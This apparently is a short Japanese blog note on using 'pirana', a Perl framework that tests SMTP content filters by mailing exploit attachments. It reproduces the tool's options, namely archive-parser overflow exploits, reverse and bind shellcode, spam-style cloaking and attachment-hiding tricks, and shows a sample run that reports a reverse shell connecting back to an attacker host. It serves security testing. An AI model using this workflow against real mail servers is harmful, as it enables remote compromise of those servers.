piranaの使い方。

piranaは、SMTPのコンテンツフィルターをチェックするためのフレームワークです。

オプション

bt # ./pirana.pl
At least one mandatory option is missing...
Usage: pirana.pl [MANDATORY ARGS] [OPTIONAL ARGS]

Mandatory arguments:
-e+ Exploit number to use (See below)
-h+ SMTP server to test
-a+ Destination email address used in probing

Optional arguments:
-s+ Shellcode type to inject into exploits (See below)
-c+ Cloaking style (See below)
-d+ Try to vanish attachements from MUA's view (See below)
-v Attach EICAR virus to improve stealthness
-z Pack all the malware into a tarball to be less noisy
-p+ Port to use in reverse shell or bind shell
-l+ Host to connect back in reverse shell mode

Valid exploits numbers:
0 OSVDB #5753: LHA get_header File Name Overflow
1 OSVDB #5754: LHA get_header Directory Name Overflow
2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow
3 OSVDB #11695: unarj Filename Handling Overflow
4 OSVDB #23460: ZOO combine File and Dir name overflow
5 OSVDB #15867: Convert UUlib uunconc integer overflow
6 OSVDB #XXX: ZOO next offset infinite loop DoS

Valid shellcode types:
0 TCP reverse shell
1 UDP reverse shell
2 TCP bind shell

Valid cloaking styles (consult whitepaper for visual result):
0 No cloaking at all (default)
1 Viagra spam message
2 "Look at the pictures I promised you!"

Vanishing techniques for attachements:
0 No vanishing at all (default)
1 Multipart/alternative trick
2 trick

例

bt # ./pirana.pl -e 0 -h mail.sample.com -a masashi -s 0 -l 192.168.1.2 -p 1234
Generating shellcode in /tmp/raw ... Done!!!
Generating files ranging from offset 0xbfffa000 to 0xbfffffff
...................................................................
The email has been sent to yoshida through mail.sample.com
You should now have a shell on 192.168.1.2:1234 !!!

本気でテストできるメールサーバーがないのでそのうちちゃんと書き直します。
Metasploit frameworkからshellcode生成しているようだから、下手に扱うとサーバーフルボッコだからね。